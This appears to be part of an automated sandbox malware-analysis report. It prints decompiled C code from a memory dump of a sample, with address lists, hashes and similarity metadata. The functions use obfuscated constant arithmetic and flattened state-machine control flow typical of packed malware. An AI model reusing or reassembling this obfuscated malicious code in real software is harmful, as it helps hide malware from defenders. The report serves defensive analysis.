                                              0x0022732e
                                              0x00227537
                                              0x00227334
                                              0x00227336
                                              0x002273d6
                                              0x002273db
                                              0x00227413
                                              0x0022741a
                                              0x0022741d
                                              0x0022741f
                                              0x00227427
                                              0x002272fc
                                              0x002272fc
                                              0x002272fe
                                              0x002272ff
                                              0x002272ff
                                              0x00000000
                                              0x002272ff
                                              0x0022733c
                                              0x0022733c
                                              0x0022733e
                                              0x00227344
                                              0x00227351
                                              0x00227356
                                              0x00227392
                                              0x002273b4
                                              0x002273b7
                                              0x002273bc
                                              0x00227504
                                              0x00227506
                                              0x0022750b
                                              0x0022750b
                                              0x00000000
                                              0x0022733e
                                              0x00227336
                                              0x0022732e
                                              0x00227322
                                              0x00227316
                                              0x0022753f
                                              0x00227550
                                              0x0022750c
                                              0x0022750c
                                              0x00000000
                                              0x00227518
                                              0x002272ff

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: "D$)$6oD$7i$<]$C'$RX$Sg$`c$c$g)s
                                              • API String ID: 1514166925-3192994148
                                              • Opcode ID: 0b27f7491b36ca6e7318df1be1e72280c94c669c8f07105f5e319c38d70d3a35
                                              • Instruction ID: eb852ace79b6ad8d1eb8d51ac307610bf3e9cd273e5c45c5d2f5caa429e85b36
                                              • Opcode Fuzzy Hash: 0b27f7491b36ca6e7318df1be1e72280c94c669c8f07105f5e319c38d70d3a35
                                              • Instruction Fuzzy Hash: AF02037251C7819FE3A5CF61D84AA4BBBE1BBC5748F10890CF2D9862A0D7B58919CF03
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022BB3A, Relevance: 14.0, Strings: 11, Instructions: 273COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E0022BB3A(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				char _t284;
				signed int _t317;
				void* _t322;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				intOrPtr _t357;
				signed int* _t360;

				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				_t284 = E0022602B(0);
				_v72 = _t284;
				_t357 = _t284;
				_v176 = 0x3707;
				_t360 =  &(( &_v188)[9]);
				_v176 = _v176 << 3;
				_t322 = 0x3701c77e;
				_t349 = 0x1b;
				_v176 = _v176 * 0x3b;
				_v176 = _v176 ^ 0x9e3c13fc;
				_v176 = _v176 ^ 0x9e596314;
				_v152 = 0x78a7;
				_v152 = _v152 + 0x292e;
				_v152 = _v152 << 3;
				_v152 = _v152 ^ 0x00050e88;
				_v180 = 0xd511;
				_v180 = _v180 ^ 0x1d80f702;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xe181230f;
				_v180 = _v180 ^ 0xe905cae0;
				_v92 = 0xc43e;
				_v92 = _v92 + 0xffff1ae3;
				_v92 = _v92 ^ 0xffffb82c;
				_v104 = 0x4365;
				_v104 = _v104 >> 5;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x000066ec;
				_v172 = 0xf4f1;
				_v172 = _v172 + 0x10b4;
				_v172 = _v172 + 0xffffc378;
				_v172 = _v172 / _t349;
				_v172 = _v172 ^ 0x000074e7;
				_v116 = 0x37b8;
				_v116 = _v116 + 0xffff57e4;
				_v116 = _v116 + 0xb626;
				_v116 = _v116 ^ 0x0000140c;
				_v144 = 0xb795;
				_t350 = 0x49;
				_v144 = _v144 * 0x50;
				_v144 = _v144 / _t350;
				_v144 = _v144 ^ 0x000091bc;
				_v76 = 0x1dd7;
				_t351 = 0x1c;
				_v76 = _v76 * 0x75;
				_v76 = _v76 ^ 0x000d9fef;
				_v108 = 0xced7;
				_v108 = _v108 >> 5;
				_v108 = _v108 / _t351;
				_v108 = _v108 ^ 0x00005a08;
				_v136 = 0x2b88;
				_v136 = _v136 ^ 0x78d809e4;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 ^ 0x0001f73d;
				_v164 = 0x766d;
				_v164 = _v164 >> 1;
				_v164 = _v164 + 0xffffabb8;
				_t352 = 0x72;
				_v164 = _v164 * 0x5c;
				_v164 = _v164 ^ 0xfff6cd9c;
				_v168 = 0x718b;
				_v168 = _v168 ^ 0xcaa0facc;
				_v168 = _v168 ^ 0xed5841e4;
				_t112 =  &_v168; // 0xed5841e4
				_v168 =  *_t112 * 0x1f;
				_v168 = _v168 ^ 0xd720c943;
				_v100 = 0x3093;
				_v100 = _v100 << 8;
				_v100 = _v100 * 0x6e;
				_v100 = _v100 ^ 0x14df3334;
				_v80 = 0xaa77;
				_v80 = _v80 | 0xec49ccd9;
				_v80 = _v80 ^ 0xec49f00b;
				_v184 = 0x6ab1;
				_v184 = _v184 << 0x10;
				_v184 = _v184 + 0x7c9;
				_v184 = _v184 + 0xb8a8;
				_v184 = _v184 ^ 0x6ab1ec4b;
				_v96 = 0xf4af;
				_v96 = _v96 * 0x3a;
				_v96 = _v96 >> 9;
				_v96 = _v96 ^ 0x00007d4d;
				_v188 = 0xb63a;
				_v188 = _v188 ^ 0x365cf355;
				_v188 = _v188 << 2;
				_v188 = _v188 + 0xd6ce;
				_v188 = _v188 ^ 0xd971d569;
				_v120 = 0xab3a;
				_v120 = _v120 * 0x32;
				_v120 = _v120 / _t352;
				_v120 = _v120 ^ 0x00002a91;
				_v156 = 0xadc6;
				_v156 = _v156 >> 9;
				_v156 = _v156 + 0xffff5d43;
				_v156 = _v156 ^ 0xffff767e;
				_v128 = 0x4e26;
				_t353 = 0x54;
				_v128 = _v128 / _t353;
				_v128 = _v128 ^ 0xbd5b2ebf;
				_v128 = _v128 ^ 0xbd5b3d92;
				_v112 = 0x5bd4;
				_v112 = _v112 | 0xfffbefdf;
				_v112 = _v112 ^ 0xfffb9ace;
				_v88 = 0x9c25;
				_v88 = _v88 | 0xd782555b;
				_v88 = _v88 ^ 0xd782aa4a;
				_v140 = 0x1cfa;
				_v140 = _v140 >> 1;
				_t354 = 0x5d;
				_v140 = _v140 / _t354;
				_v140 = _v140 ^ 0x0000306c;
				_v148 = 0xedd7;
				_v148 = _v148 ^ 0xabf54283;
				_t355 = 0x30;
				_v148 = _v148 / _t355;
				_v148 = _v148 ^ 0x03952150;
				_v124 = 0xb354;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 + 0x3a29;
				_v124 = _v124 ^ 0x0000d052;
				_v132 = 0x3532;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 | 0xce8e7aaf;
				_v132 = _v132 ^ 0xce8e32c4;
				_v160 = 0x7409;
				_v160 = _v160 | 0x6d9a42b1;
				_v160 = _v160 + 0xffff6faf;
				_v160 = _v160 >> 2;
				_v160 = _v160 ^ 0x1b6641d5;
				_v84 = 0xb2d5;
				_v84 = _v84 * 0x47;
				_v84 = _v84 ^ 0x0031fe78;
				do {
					while(_t322 != 0x94ffda2) {
						if(_t322 == 0x11e75ef4) {
							_t317 = E00222833(_v180,  &_v72, _v92, _a8, _v104, _v172);
							_t360 =  &(_t360[5]);
							__eflags = _t317;
							if(_t317 != 0) {
								_t322 = 0x94ffda2;
								continue;
							}
						} else {
							if(_t322 == 0x3336903c) {
								E0023337D(_v124, _v72, _v132, _v160, _v84);
							} else {
								if(_t322 != 0x3701c77e) {
									goto L9;
								} else {
									_t322 = 0x11e75ef4;
									continue;
								}
							}
						}
						L12:
						return _t357;
					}
					E002393A8(_v116, _v144, _v76,  &_v68, 0x44, _v108);
					_push(_v164);
					_v68 = 0x44;
					_v60 = E0023889D(0x23c000, _v136, __eflags);
					__eflags = _v152 | _v176;
					_t357 = E00227AB1(_v168, _a16, 0x23c000, 0x23c000, _v152 | _v176, _v100, 0x23c000, 0x23c000, _v80, _v184, _v96, _a28, 0, _a8, _v188, _v120, _v72, _v156, _v128, _v112,  &_v68);
					E00232025(_v88, _v60, _v140, _v148);
					_t360 =  &(_t360[0x1a]);
					_t322 = 0x3336903c;
					L9:
					__eflags = _t322 - 0x294b0e13;
				} while (_t322 != 0x294b0e13);
				goto L12;
			}















































                                              0x0022bb44
                                              0x0022bb4d
                                              0x0022bb4e
                                              0x0022bb55
                                              0x0022bb5c
                                              0x0022bb63
                                              0x0022bb6a
                                              0x0022bb6b
                                              0x0022bb6c
                                              0x0022bb6d
                                              0x0022bb72
                                              0x0022bb79
                                              0x0022bb7b
                                              0x0022bb83
                                              0x0022bb86
                                              0x0022bb92
                                              0x0022bb99
                                              0x0022bb9c
                                              0x0022bba0
                                              0x0022bba8
                                              0x0022bbb0
                                              0x0022bbb8
                                              0x0022bbc0
                                              0x0022bbc5
                                              0x0022bbcd
                                              0x0022bbd5
                                              0x0022bbdd
                                              0x0022bbe2
                                              0x0022bbea
                                              0x0022bbf2
                                              0x0022bbfa
                                              0x0022bc02
                                              0x0022bc0a
                                              0x0022bc12
                                              0x0022bc17
                                              0x0022bc1c
                                              0x0022bc24
                                              0x0022bc2c
                                              0x0022bc34
                                              0x0022bc44
                                              0x0022bc48
                                              0x0022bc50
                                              0x0022bc58
                                              0x0022bc60
                                              0x0022bc68
                                              0x0022bc70
                                              0x0022bc7d
                                              0x0022bc80
                                              0x0022bc8c
                                              0x0022bc90
                                              0x0022bc98
                                              0x0022bcab
                                              0x0022bcac
                                              0x0022bcb3
                                              0x0022bcbe
                                              0x0022bcc6
                                              0x0022bcd1
                                              0x0022bcd5
                                              0x0022bcdd
                                              0x0022bce5
                                              0x0022bced
                                              0x0022bcf2
                                              0x0022bcfc
                                              0x0022bd04
                                              0x0022bd08
                                              0x0022bd17
                                              0x0022bd1a
                                              0x0022bd1e
                                              0x0022bd26
                                              0x0022bd2e
                                              0x0022bd36
                                              0x0022bd3e
                                              0x0022bd43
                                              0x0022bd47
                                              0x0022bd4f
                                              0x0022bd57
                                              0x0022bd61
                                              0x0022bd65
                                              0x0022bd6d
                                              0x0022bd78
                                              0x0022bd83
                                              0x0022bd8e
                                              0x0022bd96
                                              0x0022bd9b
                                              0x0022bda3
                                              0x0022bdab
                                              0x0022bdb3
                                              0x0022bdc0
                                              0x0022bdc4
                                              0x0022bdc9
                                              0x0022bdd1
                                              0x0022bdd9
                                              0x0022bde1
                                              0x0022bde6
                                              0x0022bdee
                                              0x0022bdf6
                                              0x0022be03
                                              0x0022be0f
                                              0x0022be13
                                              0x0022be1b
                                              0x0022be23
                                              0x0022be28
                                              0x0022be30
                                              0x0022be38
                                              0x0022be44
                                              0x0022be49
                                              0x0022be4f
                                              0x0022be57
                                              0x0022be5f
                                              0x0022be67
                                              0x0022be6f
                                              0x0022be77
                                              0x0022be7f
                                              0x0022be87
                                              0x0022be8f
                                              0x0022be97
                                              0x0022be9f
                                              0x0022bea4
                                              0x0022beaa
                                              0x0022beb2
                                              0x0022beba
                                              0x0022bec6
                                              0x0022bec9
                                              0x0022bed2
                                              0x0022bedf
                                              0x0022beec
                                              0x0022bef4
                                              0x0022befc
                                              0x0022bf04
                                              0x0022bf0c
                                              0x0022bf11
                                              0x0022bf19
                                              0x0022bf21
                                              0x0022bf29
                                              0x0022bf31
                                              0x0022bf39
                                              0x0022bf3e
                                              0x0022bf46
                                              0x0022bf53
                                              0x0022bf57
                                              0x0022bf5f
                                              0x0022bf5f
                                              0x0022bf65
                                              0x0022bf9e
                                              0x0022bfa3
                                              0x0022bfa6
                                              0x0022bfa8
                                              0x0022bfae
                                              0x00000000
                                              0x0022bfae
                                              0x0022bf67
                                              0x0022bf69
                                              0x0022c0b1
                                              0x0022bf6f
                                              0x0022bf75
                                              0x00000000
                                              0x0022bf7b
                                              0x0022bf7b
                                              0x00000000
                                              0x0022bf7b
                                              0x0022bf75
                                              0x0022bf69
                                              0x0022c0ba
                                              0x0022c0c5
                                              0x0022c0c5
                                              0x0022bfcf
                                              0x0022bfd4
                                              0x0022bfe1
                                              0x0022bff4
                                              0x0022c054
                                              0x0022c06b
                                              0x0022c082
                                              0x0022c087
                                              0x0022c08a
                                              0x0022c08c
                                              0x0022c08c
                                              0x0022c08c
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: t$):$.)$25$D$M}$l0$AX$f$t$tI
                                              • API String ID: 0-3778435269
                                              • Opcode ID: b5cc6e0f52db7ab353f5ef4cd476371097f499008994259507c4e62ac0fecefc
                                              • Instruction ID: abfccfa18121e23af0fb278756ae3b5bff8968c13ee305115dd84da374776c12
                                              • Opcode Fuzzy Hash: b5cc6e0f52db7ab353f5ef4cd476371097f499008994259507c4e62ac0fecefc
                                              • Instruction Fuzzy Hash: EED101715083819FE364CF65C889A1FFBE1BBC4758F20891DF29A86260D7B58A49CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00238F49, Relevance: 12.7, Strings: 10, Instructions: 223COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 95%
                                              			E00238F49() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t245;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t258;
				void* _t264;
				intOrPtr _t282;
				void* _t286;
				signed int* _t290;

				_t290 =  &_v1144;
				_v1044 = _v1044 & 0x00000000;
				_v1048 = 0x4ebe6;
				_v1128 = 0x778f;
				_v1128 = _v1128 | 0xa1323825;
				_t249 = 0x13;
				_v1128 = _v1128 / _t249;
				_v1128 = _v1128 << 2;
				_t286 = 0x35c963e4;
				_v1128 = _v1128 ^ 0x21ef9208;
				_v1052 = 0x4cd;
				_v1052 = _v1052 | 0x68cff677;
				_v1052 = _v1052 ^ 0x68cf93fd;
				_v1092 = 0x77ae;
				_v1092 = _v1092 >> 0xa;
				_v1092 = _v1092 ^ 0x00005fc7;
				_v1060 = 0x2f45;
				_v1060 = _v1060 | 0xa1a9613d;
				_v1060 = _v1060 ^ 0xa1a96f30;
				_v1096 = 0x6d0d;
				_v1096 = _v1096 << 2;
				_v1096 = _v1096 | 0xf85e23e8;
				_v1096 = _v1096 ^ 0xf85f94d5;
				_v1136 = 0xe906;
				_t250 = 0x4b;
				_v1136 = _v1136 * 0x76;
				_v1136 = _v1136 + 0x8e3a;
				_v1136 = _v1136 << 8;
				_v1136 = _v1136 ^ 0x6bf6f1e6;
				_v1104 = 0x5e2e;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 * 0x2c;
				_v1104 = _v1104 ^ 0x0000496b;
				_v1144 = 0xf2e9;
				_v1144 = _v1144 + 0xd50c;
				_v1144 = _v1144 / _t250;
				_v1144 = _v1144 ^ 0x9fddb036;
				_v1144 = _v1144 ^ 0x9fdde12f;
				_v1108 = 0x6902;
				_v1108 = _v1108 | 0xfbe10d26;
				_v1108 = _v1108 * 0x44;
				_v1108 = _v1108 ^ 0xe7e09cc2;
				_v1120 = 0xf3f1;
				_v1120 = _v1120 + 0xffff8a4f;
				_v1120 = _v1120 >> 6;
				_v1120 = _v1120 * 0x67;
				_v1120 = _v1120 ^ 0x0000b01d;
				_v1088 = 0xb368;
				_v1088 = _v1088 + 0x9734;
				_v1088 = _v1088 ^ 0x00010c20;
				_v1076 = 0x650d;
				_v1076 = _v1076 ^ 0x0544b8d8;
				_v1076 = _v1076 ^ 0x054483f2;
				_v1056 = 0xabff;
				_v1056 = _v1056 ^ 0x935518d0;
				_v1056 = _v1056 ^ 0x9355abf6;
				_v1068 = 0xb772;
				_v1068 = _v1068 << 2;
				_v1068 = _v1068 ^ 0x00028ed1;
				_v1124 = 0xbc7e;
				_v1124 = _v1124 * 0x39;
				_v1124 = _v1124 + 0x3dff;
				_v1124 = _v1124 ^ 0x966a7207;
				_v1124 = _v1124 ^ 0x9640526c;
				_v1132 = 0xba5f;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 << 5;
				_t251 = 0x75;
				_v1132 = _v1132 / _t251;
				_v1132 = _v1132 ^ 0x0197c6fa;
				_v1140 = 0x5fea;
				_t252 = 0x3c;
				_v1140 = _v1140 * 0xa;
				_v1140 = _v1140 * 0x2d;
				_v1140 = _v1140 >> 2;
				_v1140 = _v1140 ^ 0x002a725f;
				_v1100 = 0x79ec;
				_v1100 = _v1100 << 8;
				_v1100 = _v1100 ^ 0x69f808d7;
				_v1100 = _v1100 ^ 0x69818172;
				_v1084 = 0xd5eb;
				_v1084 = _v1084 ^ 0xb139babe;
				_v1084 = _v1084 ^ 0xb1392951;
				_v1072 = 0x4dbe;
				_v1072 = _v1072 ^ 0x00003bef;
				_v1080 = 0x7ef4;
				_v1080 = _v1080 / _t252;
				_v1080 = _v1080 ^ 0x00000c75;
				_v1112 = 0xcb8d;
				_v1112 = _v1112 + 0x5361;
				_v1112 = _v1112 + 0xffffff0c;
				_v1112 = _v1112 ^ 0x00015b8c;
				_v1064 = 0xba20;
				_v1064 = _v1064 ^ 0x3b22f3f3;
				_v1064 = _v1064 ^ 0x3b2222af;
				_v1116 = 0xa287;
				_v1116 = _v1116 + 0x9065;
				_t253 = 0x5f;
				_v1116 = _v1116 / _t253;
				_v1116 = _v1116 + 0xffff8b94;
				_v1116 = _v1116 ^ 0xffffc056;
				_t238 = E002385BA(_t253);
				do {
					while(_t286 != 0x2b67e243) {
						if(_t286 == 0x35036a43) {
							_push( &_v1040);
							_push( &_v520);
							return E00227B63(_v1064, _v1116, __eflags);
						}
						if(_t286 == 0x35c963e4) {
							_t286 = 0x39b3b44d;
							continue;
						}
						_t295 = _t286 - 0x39b3b44d;
						if(_t286 != 0x39b3b44d) {
							goto L8;
						}
						_push(_v1092);
						_t245 = E0023889D(0x23c9b0, _v1052, _t295);
						_pop(_t264);
						_t282 =  *0x23ca2c; // 0x4d8300
						_t196 = _t282 + 0x230; // 0x700047
						E0022C680(_t196, _v1096, _v1136, _t264, _v1104,  *0x23ca2c, _t245,  &_v520);
						_t238 = E00232025(_v1144, _t245, _v1108, _v1120);
						_t290 =  &(_t290[9]);
						_t286 = 0x2b67e243;
					}
					_push(_v1076);
					_t239 = E0023889D(0x23c980, _v1088, __eflags);
					_t240 = E00238C8F(_v1056);
					_t258 =  *0x23ca2c; // 0x4d8300
					_t210 = _t258 + 0x230; // 0x4d8530
					E002229E3(_t210, 0x104, _t239, _v1124, _v1132, _v1140, _t240,  &_v1040, _v1100, _v1084);
					_t238 = E00232025(_v1072, _t239, _v1080, _v1112);
					_t290 =  &(_t290[0xc]);
					_t286 = 0x35036a43;
					L8:
					__eflags = _t286 - 0x38d0088b;
				} while (__eflags != 0);
				return _t238;
			}













































                                              0x00238f49
                                              0x00238f4f
                                              0x00238f56
                                              0x00238f5e
                                              0x00238f66
                                              0x00238f78
                                              0x00238f7d
                                              0x00238f83
                                              0x00238f88
                                              0x00238f8d
                                              0x00238f95
                                              0x00238f9d
                                              0x00238fa5
                                              0x00238fad
                                              0x00238fb5
                                              0x00238fc2
                                              0x00238fca
                                              0x00238fd2
                                              0x00238fda
                                              0x00238fe2
                                              0x00238fea
                                              0x00238fef
                                              0x00238ff7
                                              0x00238fff
                                              0x0023900c
                                              0x0023900d
                                              0x00239011
                                              0x00239019
                                              0x0023901e
                                              0x00239026
                                              0x0023902e
                                              0x00239038
                                              0x0023903c
                                              0x00239044
                                              0x0023904c
                                              0x0023905a
                                              0x0023905e
                                              0x00239066
                                              0x0023906e
                                              0x00239076
                                              0x00239083
                                              0x00239087
                                              0x0023908f
                                              0x00239097
                                              0x0023909f
                                              0x002390a9
                                              0x002390ad
                                              0x002390b5
                                              0x002390bd
                                              0x002390c5
                                              0x002390cd
                                              0x002390d5
                                              0x002390dd
                                              0x002390e5
                                              0x002390ed
                                              0x002390f5
                                              0x002390fd
                                              0x00239105
                                              0x0023910a
                                              0x00239112
                                              0x0023911f
                                              0x00239123
                                              0x0023912b
                                              0x00239133
                                              0x0023913d
                                              0x00239145
                                              0x0023914a
                                              0x00239155
                                              0x0023915a
                                              0x00239160
                                              0x00239168
                                              0x00239175
                                              0x00239178
                                              0x00239181
                                              0x00239185
                                              0x0023918a
                                              0x00239192
                                              0x0023919a
                                              0x0023919f
                                              0x002391a7
                                              0x002391af
                                              0x002391b7
                                              0x002391bf
                                              0x002391c7
                                              0x002391d7
                                              0x002391df
                                              0x002391ef
                                              0x002391f3
                                              0x002391fb
                                              0x00239203
                                              0x0023920b
                                              0x00239213
                                              0x0023921b
                                              0x00239223
                                              0x0023922b
                                              0x00239233
                                              0x0023923b
                                              0x00239247
                                              0x0023924a
                                              0x0023924e
                                              0x00239256
                                              0x00239262
                                              0x00239276
                                              0x00239276
                                              0x00239280
                                              0x0023938d
                                              0x00239395
                                              0x00000000
                                              0x0023939c
                                              0x0023928c
                                              0x002392fc
                                              0x00000000
                                              0x002392fc
                                              0x0023928e
                                              0x00239290
                                              0x00000000
                                              0x00000000
                                              0x00239296
                                              0x002392a3
                                              0x002392a8
                                              0x002392c7
                                              0x002392d4
                                              0x002392da
                                              0x002392ed
                                              0x002392f2
                                              0x002392f5
                                              0x002392f5
                                              0x00239303
                                              0x00239310
                                              0x0023931f
                                              0x00239341
                                              0x0023934d
                                              0x00239353
                                              0x00239369
                                              0x0023936e
                                              0x00239371
                                              0x00239373
                                              0x00239373
                                              0x00239373
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: e$m$Cg+$E/$_r*$_r*$aS$kI$;$y
                                              • API String ID: 0-1402005448
                                              • Opcode ID: d3bf207e22b52e11e7f13a02026bbfedc06e61e5dcf6df00202b020b23f4bb4a
                                              • Instruction ID: 237b7163dc6f5d39174d1ecd80c501c49dc883d5f6eba0a38b040e060e0bfed6
                                              • Opcode Fuzzy Hash: d3bf207e22b52e11e7f13a02026bbfedc06e61e5dcf6df00202b020b23f4bb4a
                                              • Instruction Fuzzy Hash: 78B132B141D3819FD358CF64C58A50BFBE1FBC4798F208A1DF595862A0C7B98A48CF82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00231773, Relevance: 12.6, Strings: 10, Instructions: 147COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E00231773(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* __ecx;
				void* _t131;
				void* _t148;
				void* _t151;
				signed int _t162;
				void* _t164;
				signed int* _t167;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0022602B(_t131);
				_v32 = 0x943f;
				_t167 =  &(( &_v64)[6]);
				_t164 = 0;
				_t151 = 0x349de80e;
				_t162 = 0x48;
				_v32 = _v32 * 0x69;
				_v32 = _v32 ^ 0x003ccdd6;
				_v56 = 0x5d22;
				_v56 = _v56 << 0xb;
				_v56 = _v56 * 0x6c;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 ^ 0x0003a52d;
				_v48 = 0xb9ad;
				_v48 = _v48 / _t162;
				_v48 = _v48 | 0x8e45101b;
				_v48 = _v48 ^ 0xce45129f;
				_v16 = 0x4535;
				_v16 = _v16 + 0xffff440f;
				_v16 = _v16 ^ 0xbfff8944;
				_v24 = 0xd710;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x000d4c75;
				_v44 = 0x65fd;
				_v44 = _v44 >> 2;
				_v44 = _v44 | 0x32207922;
				_v44 = _v44 ^ 0x322078de;
				_v28 = 0xded8;
				_v28 = _v28 ^ 0x86a01735;
				_v28 = _v28 ^ 0x86a0c6d1;
				_v64 = 0xdb93;
				_v64 = _v64 + 0x597e;
				_v64 = _v64 << 0xa;
				_v64 = _v64 << 0xa;
				_v64 = _v64 ^ 0x5110354e;
				_v60 = 0x2ada;
				_v60 = _v60 | 0x1c3e2a8f;
				_v60 = _v60 + 0xf49a;
				_v60 = _v60 ^ 0xe6209c52;
				_v60 = _v60 ^ 0xfa1f8dfc;
				_v20 = 0xdaa6;
				_v20 = _v20 + 0xb461;
				_v20 = _v20 ^ 0x0001dcca;
				_v40 = 0x4872;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0xb451885a;
				_v40 = _v40 ^ 0xb451b970;
				_v36 = 0x262e;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 + 0x6428;
				_v36 = _v36 ^ 0x00003c11;
				_v8 = 0x6e80;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x06e82b80;
				_v12 = 0x3e9d;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x00005153;
				_v52 = 0x8462;
				_v52 = _v52 ^ 0xcdf70fa2;
				_v52 = _v52 ^ 0xe5a9b23c;
				_v52 = _v52 | 0x26296c1d;
				_v52 = _v52 ^ 0x2e7f2e4a;
				do {
					while(_t151 != 0x6cb1230) {
						if(_t151 == 0x944062a) {
							_push(_t151);
							_push(_t151);
							_t164 = E00228736(_v4 + _v4);
							if(_t164 != 0) {
								_t151 = 0x6cb1230;
								continue;
							}
						} else {
							if(_t151 == 0x30a4ce3e) {
								_t148 = E002377A3(_a4,  &_v4, _v24, _v44, _a8, _v28, 0, _v64, _v48 | _v32);
								_t167 =  &(_t167[7]);
								if(_t148 != 0) {
									_t151 = 0x944062a;
									continue;
								}
							} else {
								if(_t151 != 0x349de80e) {
									goto L11;
								} else {
									_t151 = 0x30a4ce3e;
									continue;
								}
							}
						}
						goto L12;
					}
					E002377A3(_a4,  &_v4, _v36, _v8, _a8, _v12, _t164, _v52, _v16 | _v56);
					_t167 =  &(_t167[7]);
					_t151 = 0x222ae378;
					L11:
				} while (_t151 != 0x222ae378);
				L12:
				return _t164;
			}


























                                              0x0023177a
                                              0x0023177e
                                              0x00231782
                                              0x00231786
                                              0x0023178a
                                              0x0023178c
                                              0x00231791
                                              0x00231799
                                              0x002317a3
                                              0x002317a5
                                              0x002317b6
                                              0x002317b7
                                              0x002317bb
                                              0x002317c3
                                              0x002317cb
                                              0x002317d5
                                              0x002317d9
                                              0x002317de
                                              0x002317e6
                                              0x002317f9
                                              0x002317fd
                                              0x00231805
                                              0x0023180d
                                              0x00231815
                                              0x0023181d
                                              0x00231825
                                              0x0023182d
                                              0x00231832
                                              0x0023183a
                                              0x00231842
                                              0x00231847
                                              0x0023184f
                                              0x00231857
                                              0x0023185f
                                              0x00231867
                                              0x0023186f
                                              0x00231877
                                              0x0023187f
                                              0x00231884
                                              0x00231889
                                              0x00231891
                                              0x00231899
                                              0x002318a1
                                              0x002318a9
                                              0x002318b1
                                              0x002318b9
                                              0x002318c1
                                              0x002318c9
                                              0x002318d1
                                              0x002318d9
                                              0x002318de
                                              0x002318e6
                                              0x002318ee
                                              0x002318f6
                                              0x002318fb
                                              0x00231903
                                              0x0023190b
                                              0x00231913
                                              0x00231918
                                              0x00231920
                                              0x00231928
                                              0x0023192d
                                              0x00231935
                                              0x0023193d
                                              0x00231945
                                              0x0023194d
                                              0x00231955
                                              0x0023195d
                                              0x0023195d
                                              0x00231963
                                              0x002319c0
                                              0x002319c1
                                              0x002319ca
                                              0x002319d0
                                              0x002319d2
                                              0x00000000
                                              0x002319d2
                                              0x00231965
                                              0x00231967
                                              0x002319a0
                                              0x002319a5
                                              0x002319aa
                                              0x002319ac
                                              0x00000000
                                              0x002319ac
                                              0x00231969
                                              0x0023196f
                                              0x00000000
                                              0x00231975
                                              0x00231975
                                              0x00000000
                                              0x00231975
                                              0x0023196f
                                              0x00231967
                                              0x00000000
